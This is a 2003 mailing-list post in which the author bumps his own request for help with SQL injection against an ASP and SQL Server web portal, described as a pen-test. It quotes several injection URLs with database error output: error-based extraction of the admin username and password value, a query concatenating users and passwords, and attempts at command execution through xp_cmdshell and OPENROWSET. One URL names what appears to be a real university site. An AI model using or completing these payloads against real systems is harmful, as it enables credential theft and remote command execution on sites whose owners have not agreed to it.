Re: SQL Injection ASP+SQL Server (problem) !?
From: Wendel (wendel_at_hadrion.com.br)
Date: 07/25/03
- Previous message: Stephan Neuhaus: "Re: Digital Signature Lifetime"
- In reply to: Wendel: "SQL Injection ASP+SQL Server (problem) !?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 25 Jul 2003 05:06:14 -0700
UP
(Wendel) wrote in message news:<99b40b3f.0307231126.53659811@posting.google.com>...
> Hi,
>
> I'm doing a pen-test in a WebServer running Win2K + IIS + ASP + SQL
> Server (filtred for internet connections).
>
> The IIS appear to be very well patched. I'm trying SQL Injection. :)
>
> I found a bug in ASP Script... see:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
>
> I received the name of the min(user) in users tables, see:
>
> Technical Information (for support personnel)
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
> the nvarchar value 'admin' to a column of data type int.
>
> The username is "admin". Now i want to know the password of "admin" i
> tryed:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
>
> But i received it:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more
> than 1 value. This is not permitted when the subquery follows =, !=,
> <, <= , >, >= or when the subquery is used as an expression.
>
> 1 - Someone know how to do it return more than 1 value ?? can give-me
> a example ?
>
> I tryed it too:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
>
> And i receive it:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
> the varchar value '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481-0512-0545-0576-0609-0640}'
> to a column of data type int.
>
> 2 - But it isn't a "password", it appear be a registry key. Someone
> know what is it ?? And how to do it work and see the password ? :)
>
> 3 - I tryed to create a SQL Transaction like this:
>
> http://www.server.com/portal/index.asp?local=read&id_noticia=";%20begin%20declare%20@ret%20varchar(8000)%20set%20@ret=':'%20select%20@ret=@ret+'%20?+user+'/'+senha%20from%20users%20where%20user>@ret%20select%20@ret%20as%20ret%20into%20alluser%20end%20--
>
> I receive it:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
> starts with '; begin declare @ret varchar(8000) set @ret=':' select
> @ret=@ret ' ? user '/' senha from users where user>@ret select @ret
> as' is too long. Maximum length is 128.
>
> Someone know why i received this error ?? I overfflowed the sized
> allowed in paramter by variable in ASP ? or in SQL Server ? How to do
> it work ?? :)
>
> 4 - My last doubt. I tryed execute commands with xp_cmdshell.. see:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--
>
> and receive:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> before the character string ';EXEC master..xp_cmdshell(cmd.exe /c)--'.
>
>
> OR:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
> syntax near ';EXEC master.dbo.xp_cmdshell'.
>
> OR using quotes:
>
> http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
> syntax near '`'.
>
>
> And tryed too (use the bug to exec xp_cmdshell stored procedure with a
> non privilegied user):
>
> http://www.server.com/portal/index.asp?local=read&id_notice=";(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
>
> I receive ... again the error:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
> starts with ';(SELECT * FROM
> OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET
> FMTONLY OFF execute master..xp_cmdshell' is too long. Maximum length
> is 128.
>
>
> If i try:
>
> http://www.liape.unaerp.br/portal/index.asp?local=ler&id_noticia=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
>
> I receive:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Could not create an
> instance of OLE DB provider 'SQLOLEDB'.
>
> What i'm doing wrong ?? How to do it work ??
>
> Thkz a lot.
>
> Best Regards.
>
> [ ]'s
- Previous message: Stephan Neuhaus: "Re: Digital Signature Lifetime"
- In reply to: Wendel: "SQL Injection ASP+SQL Server (problem) !?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
